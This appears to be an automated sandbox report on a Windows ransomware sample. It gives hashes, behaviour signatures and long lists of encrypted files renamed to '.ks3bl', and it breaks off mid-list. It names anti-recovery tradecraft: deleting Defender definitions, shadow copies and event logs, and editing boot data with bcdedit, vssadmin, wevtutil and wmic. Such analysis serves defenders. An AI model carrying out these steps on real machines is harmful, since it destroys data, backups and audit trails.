Analysis
-
max time kernel
116s -
max time network
118s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
22/11/2021, 11:37
Static task
static1
Behavioral task
behavioral1
Sample
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe
Resource
win10-en-20211014
General
-
Target
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe
-
Size
3.4MB
-
MD5
748281385a89ef70a5edfd92524d4352
-
SHA1
133e478af4b36359f51e3d4e5de58401fb8ec179
-
SHA256
400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278
-
SHA512
9086f75237f1acfa6dc62243af54bf888d9c69ed9f53d91f2af25c229499279e25691cf4c58e5b03d0feb74618719fd94411d8bc78e81bb4daa0a0d853befcba
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 376 MpCmdRun.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1496 bcdedit.exe 1796 bcdedit.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\RemoveStep.crw.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_HE40s8cBbAw0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File renamed C:\Users\Admin\Pictures\InitializeStart.raw => C:\Users\Admin\Pictures\InitializeStart.raw.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_8MNguFREPeI0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Users\Admin\Pictures\InitializeStart.raw.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_8MNguFREPeI0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File renamed C:\Users\Admin\Pictures\CloseGroup.png => C:\Users\Admin\Pictures\CloseGroup.png.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_tTWjA2KDqoE0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Users\Admin\Pictures\CloseGroup.png.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_tTWjA2KDqoE0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File renamed C:\Users\Admin\Pictures\CompressWait.raw => C:\Users\Admin\Pictures\CompressWait.raw.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_aqsPILVGJ1Y0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Users\Admin\Pictures\CompressWait.raw.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_aqsPILVGJ1Y0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File renamed C:\Users\Admin\Pictures\RemoveStep.crw => C:\Users\Admin\Pictures\RemoveStep.crw.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_HE40s8cBbAw0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ta.txt.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_OtXOK8xfPDs0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-black_scale-100.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_eqRtmdZ6xh00.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\LargeTile.scale-200.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\trusted.libraries.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_NbUKMg3t-wk0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\shape_tetrahedron.3mf 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\Square310x150Logo.scale-100.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\StopwatchMedTile.scale-200.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_E5vOQRlLl4I0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\officemui.msi.16.en-us.tree.dat.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_cU0phlNPbqQ0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\WideTile.scale-200.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\comment.svg.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_gSnIlOzvRYU0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OneConnectLargeTile.scale-200.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\za_60x42.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6478_40x40x32.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6918_24x24x32.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fr_get.svg.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_9DwtZ-aJhcQ0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Grace-ul-oob.xrm-ms.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_v1U1EiE7tdY0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\LargeTile.scale-125.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\mask\12d.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosWideTile.scale-200.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\OneConnectAppList.targetsize-36.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\hm_16x11.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_altform-unplated_contrast-black.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_4dfaWjHIhvo0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsStoreLogo.scale-125.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Concrete.dxt 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_K25F_7zv3TY0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-pl.xrm-ms.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_sx5wcepod_c0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsym.ttf.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_Eu65J53QsDk0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Windows Defender\ClientWMIInstall.mof 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\moe_status_icons.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-256_contrast-white.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_VfzDOTwQakc0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ppd.xrm-ms.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_7WhueS45oQc0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200_contrast-black.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\common\Board_Yet_.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\StopwatchWideTile.scale-200.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\s_empty_folder_state.svg.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_LCW5exbi5-w0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_hW2AFpd7eQk0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_aavC4WhC8EA0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\bg\msipc.dll.mui.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_JI79_4Lb56k0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\drunk.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\malthe.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_XLl_3y290wk0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_iPZcJIqAkBs0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-black\SmallTile.scale-100.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\4632_24x24x32.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-unplated_contrast-white.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\LargeTile.scale-100.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\ui-strings.js.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_oQYcUUymH4k0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\pw_16x11.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-48.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-48.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\pyramid\Careful_Excavation_.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cg_16x11.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\bg1.jpg 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left-pressed.gif.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_LrGwKksox740.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\sunec.jar.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_BAe6YyJB5ts0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Cloud.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_2x.png.tA4YgXaMLmr7Jo6cz5fo3LbMbEBwRxC_aMfHmoR04EX_Y1KJ4DH_drg0.ks3bl 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-40_altform-unplated.png 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2948 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1164 powershell.exe 1164 powershell.exe 1164 powershell.exe 1536 powershell.exe 1536 powershell.exe 1536 powershell.exe 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 3560 wevtutil.exe Token: SeBackupPrivilege 3560 wevtutil.exe Token: SeSecurityPrivilege 1516 wevtutil.exe Token: SeBackupPrivilege 1516 wevtutil.exe Token: SeSecurityPrivilege 2244 wevtutil.exe Token: SeBackupPrivilege 2244 wevtutil.exe Token: SeIncreaseQuotaPrivilege 592 wmic.exe Token: SeSecurityPrivilege 592 wmic.exe Token: SeTakeOwnershipPrivilege 592 wmic.exe Token: SeLoadDriverPrivilege 592 wmic.exe Token: SeSystemProfilePrivilege 592 wmic.exe Token: SeSystemtimePrivilege 592 wmic.exe Token: SeProfSingleProcessPrivilege 592 wmic.exe Token: SeIncBasePriorityPrivilege 592 wmic.exe Token: SeCreatePagefilePrivilege 592 wmic.exe Token: SeBackupPrivilege 592 wmic.exe Token: SeRestorePrivilege 592 wmic.exe Token: SeShutdownPrivilege 592 wmic.exe Token: SeDebugPrivilege 592 wmic.exe Token: SeSystemEnvironmentPrivilege 592 wmic.exe Token: SeRemoteShutdownPrivilege 592 wmic.exe Token: SeUndockPrivilege 592 wmic.exe Token: SeManageVolumePrivilege 592 wmic.exe Token: 33 592 wmic.exe Token: 34 592 wmic.exe Token: 35 592 wmic.exe Token: 36 592 wmic.exe Token: SeIncreaseQuotaPrivilege 1252 wmic.exe Token: SeSecurityPrivilege 1252 wmic.exe Token: SeTakeOwnershipPrivilege 1252 wmic.exe Token: SeLoadDriverPrivilege 1252 wmic.exe Token: SeSystemProfilePrivilege 1252 wmic.exe Token: SeSystemtimePrivilege 1252 wmic.exe Token: SeProfSingleProcessPrivilege 1252 wmic.exe Token: SeIncBasePriorityPrivilege 1252 wmic.exe Token: SeCreatePagefilePrivilege 1252 wmic.exe Token: SeBackupPrivilege 1252 wmic.exe Token: SeRestorePrivilege 1252 wmic.exe Token: SeShutdownPrivilege 1252 wmic.exe Token: SeDebugPrivilege 1252 wmic.exe Token: SeSystemEnvironmentPrivilege 1252 wmic.exe Token: SeRemoteShutdownPrivilege 1252 wmic.exe Token: SeUndockPrivilege 1252 wmic.exe Token: SeManageVolumePrivilege 1252 wmic.exe Token: 33 1252 wmic.exe Token: 34 1252 wmic.exe Token: 35 1252 wmic.exe Token: 36 1252 wmic.exe Token: SeIncreaseQuotaPrivilege 1252 wmic.exe Token: SeSecurityPrivilege 1252 wmic.exe Token: SeTakeOwnershipPrivilege 1252 wmic.exe Token: SeLoadDriverPrivilege 1252 wmic.exe Token: SeSystemProfilePrivilege 1252 wmic.exe Token: SeSystemtimePrivilege 1252 wmic.exe Token: SeProfSingleProcessPrivilege 1252 wmic.exe Token: SeIncBasePriorityPrivilege 1252 wmic.exe Token: SeCreatePagefilePrivilege 1252 wmic.exe Token: SeBackupPrivilege 1252 wmic.exe Token: SeRestorePrivilege 1252 wmic.exe Token: SeShutdownPrivilege 1252 wmic.exe Token: SeDebugPrivilege 1252 wmic.exe Token: SeSystemEnvironmentPrivilege 1252 wmic.exe Token: SeRemoteShutdownPrivilege 1252 wmic.exe Token: SeUndockPrivilege 1252 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3208 wrote to memory of 548 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 69 PID 3208 wrote to memory of 548 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 69 PID 548 wrote to memory of 1344 548 net.exe 71 PID 548 wrote to memory of 1344 548 net.exe 71 PID 3208 wrote to memory of 2624 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 72 PID 3208 wrote to memory of 2624 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 72 PID 2624 wrote to memory of 1252 2624 net.exe 74 PID 2624 wrote to memory of 1252 2624 net.exe 74 PID 3208 wrote to memory of 1336 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 75 PID 3208 wrote to memory of 1336 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 75 PID 1336 wrote to memory of 1576 1336 net.exe 77 PID 1336 wrote to memory of 1576 1336 net.exe 77 PID 3208 wrote to memory of 900 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 78 PID 3208 wrote to memory of 900 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 78 PID 900 wrote to memory of 4008 900 net.exe 80 PID 900 wrote to memory of 4008 900 net.exe 80 PID 3208 wrote to memory of 3736 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 81 PID 3208 wrote to memory of 3736 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 81 PID 3736 wrote to memory of 4048 3736 net.exe 83 PID 3736 wrote to memory of 4048 3736 net.exe 83 PID 3208 wrote to memory of 2128 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 84 PID 3208 wrote to memory of 2128 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 84 PID 2128 wrote to memory of 2876 2128 net.exe 86 PID 2128 wrote to memory of 2876 2128 net.exe 86 PID 3208 wrote to memory of 2040 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 87 PID 3208 wrote to memory of 2040 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 87 PID 2040 wrote to memory of 676 2040 net.exe 89 PID 2040 wrote to memory of 676 2040 net.exe 89 PID 3208 wrote to memory of 1288 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 90 PID 3208 wrote to memory of 1288 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 90 PID 1288 wrote to memory of 1168 1288 net.exe 92 PID 1288 wrote to memory of 1168 1288 net.exe 92 PID 3208 wrote to memory of 2364 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 93 PID 3208 wrote to memory of 2364 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 93 PID 2364 wrote to memory of 2448 2364 net.exe 95 PID 2364 wrote to memory of 2448 2364 net.exe 95 PID 3208 wrote to memory of 3644 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 96 PID 3208 wrote to memory of 3644 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 96 PID 3208 wrote to memory of 1620 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 98 PID 3208 wrote to memory of 1620 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 98 PID 3208 wrote to memory of 948 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 100 PID 3208 wrote to memory of 948 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 100 PID 3208 wrote to memory of 1156 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 102 PID 3208 wrote to memory of 1156 3208 400743b945a4341559734ca144be4a96d325b9cb76169a5c43e82b21d3c59278.exe 102 PID 3208 wrote to memory of 428 3208 